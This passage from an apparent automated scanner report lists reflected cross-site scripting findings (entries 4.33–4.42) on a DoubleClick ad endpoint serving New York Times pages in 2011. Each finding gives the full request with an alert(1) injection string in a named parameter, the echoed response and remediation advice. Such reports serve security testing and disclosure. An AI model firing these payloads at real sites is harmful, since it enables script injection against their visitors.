4.33. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9fe6"-alert(1)-"fa3faa6ea46 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250a9fe6"-alert(1)-"fa3faa6ea46&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250a9fe6"-alert(1)-"fa3faa6ea46&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.34. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5909"-alert(1)-"a7ebfd9570c was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2a5909"-alert(1)-"a7ebfd9570c&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2a5909"-alert(1)-"a7ebfd9570c&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinven
...[SNIP]...

4.35. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97db5'-alert(1)-'4e226fa9882 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt297db5'-alert(1)-'4e226fa9882&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt297db5'-alert(1)-'4e226fa9882&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinven
...[SNIP]...

4.36. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a57a'-alert(1)-'b094c8c4161 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=8a57a'-alert(1)-'b094c8c4161 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
log.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=8a57a'-alert(1)-'b094c8c4161http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.37. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f305"-alert(1)-"afeb150ce3f was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=5f305"-alert(1)-"afeb150ce3f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
log.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=5f305"-alert(1)-"afeb150ce3fhttp://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

4.38. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9518e'-alert(1)-'46a7facb548 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=&9518e'-alert(1)-'46a7facb548=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
og.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=&9518e'-alert(1)-'46a7facb548=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.39. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f24ed"-alert(1)-"8ce055443cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=&f24ed"-alert(1)-"8ce055443cf=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
og.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=&f24ed"-alert(1)-"8ce055443cf=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

4.40. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7af86"-alert(1)-"e31326cfed3 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook7af86"-alert(1)-"e31326cfed3&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook7af86"-alert(1)-"e31326cfed3&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.co
...[SNIP]...

4.41. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebf52'-alert(1)-'3a8faa3de5c was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbookebf52'-alert(1)-'3a8faa3de5c&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbookebf52'-alert(1)-'3a8faa3de5c&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.co
...[SNIP]...

4.42. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6485"-alert(1)-"096b3fe0a0 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRightf6485"-alert(1)-"096b3fe0a0&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6762

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
